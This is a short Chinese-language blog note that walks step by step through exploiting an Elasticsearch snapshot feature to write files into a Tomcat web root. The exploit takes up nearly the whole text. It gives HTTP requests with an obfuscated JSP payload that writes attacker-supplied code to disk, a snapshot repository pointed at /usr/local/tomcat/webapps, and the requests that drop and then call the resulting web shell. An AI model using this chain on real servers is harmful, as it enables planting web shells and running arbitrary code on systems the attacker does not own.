【笔记】Elasticsearch文件写入漏洞利用

发表于 更新于 阅读次数:

前言

Elasticsearch文件写入漏洞利用

exp

  1. 写入的文件内容

47, 116, 101, 115, 116, 46, 106, 115, 112:生成文件的名为test.jsp
120:参数键名为x

request
1
2
3
4
5
6
POST http://127.0.0.1:9200/x.jsp/x.jsp/1
Content-Type: application/json

{
  "<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47, 116, 101, 115, 116, 46, 106, 115, 112})), new String(new byte[]{114, 119})).write(request.getParameter(new String(new byte[]{120})).getBytes());%>": "x"
}
1
{"_index": "x.jsp", "_type": "x.jsp", "_id": "1", "_version": 1, "created": true}
  1. 移动文件到Tomcat站点根目录/usr/local/tomcat/webapps
request
1
2
3
4
5
6
7
8
9
10
PUT http://127.0.0.1:9200/_snapshot/x.jsp
Content-Type: application/json

{
  "type": "fs",
  "settings": {
    "location": "/usr/local/tomcat/webapps",
    "compress": false
  }
}
1
{"acknowledged":true}
  1. 定义文件解析规则
request
1
2
3
4
5
6
7
8
PUT http://127.0.0.1:9200/_snapshot/x.jsp/x.jsp
Content-Type: application/json

{
  "indices": "x.jsp",
  "ignore_unavailable": true,
  "include_global_state": false
}
1
{"accepted": true}

漏洞利用

  • 访问Tomcat,触发exp,在当前目录下生成文件并写入内容

x:由exp定义的参数键名
<jsp>:文件内容,通常是JSP代码

request
1
GET http://127.0.0.1:8080/x.jsp/snapshot-x.jsp?x=<jsp>
  • 访问刚刚生成的JSP代码

test.jsp:由exp定义的生成的文件名

request
1
GET http://127.0.0.1:8080/test.jsp

完成

参考文献

哔哩哔哩——xiaodisec